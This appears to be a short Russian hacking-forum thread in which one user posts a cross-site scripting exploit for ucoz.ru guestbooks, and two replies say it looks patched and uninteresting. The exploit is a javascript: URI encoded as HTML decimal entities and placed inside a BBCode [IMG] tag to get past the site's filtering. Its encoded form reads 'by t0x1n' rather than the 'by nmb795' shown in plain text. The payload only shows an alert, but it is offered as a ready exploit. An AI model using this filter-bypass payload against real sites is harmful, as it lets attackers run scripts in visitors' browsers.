Cross Site Scripting на ucoz.ru

[Robin Gud]

Cross Site Scripting в гостевых книгах ucoz.ru
XSS в тегах

Сначало берем какой нибудь скрипт на JS:

JavаScript:alert("by nmb795, 'XSS'")

Затем кодируем это в html кодировку:

&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#34&#98&#121&#32&#116&#48&#120&#49&#110&#44&#32&#39&#88&#83&#83&#39&#34&#41

И вот полный эксплоит:

[IMG]&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#34&#98&#121&#32&#116&#48&#120&#49&#110&#44&#32&#39&#88&#83&#83&#39&#34&#41[/IMG]

 

[Alabay]

Прикрыли по ходу.

 

[Nax[no]rt]

Да ну в гостевых не интересно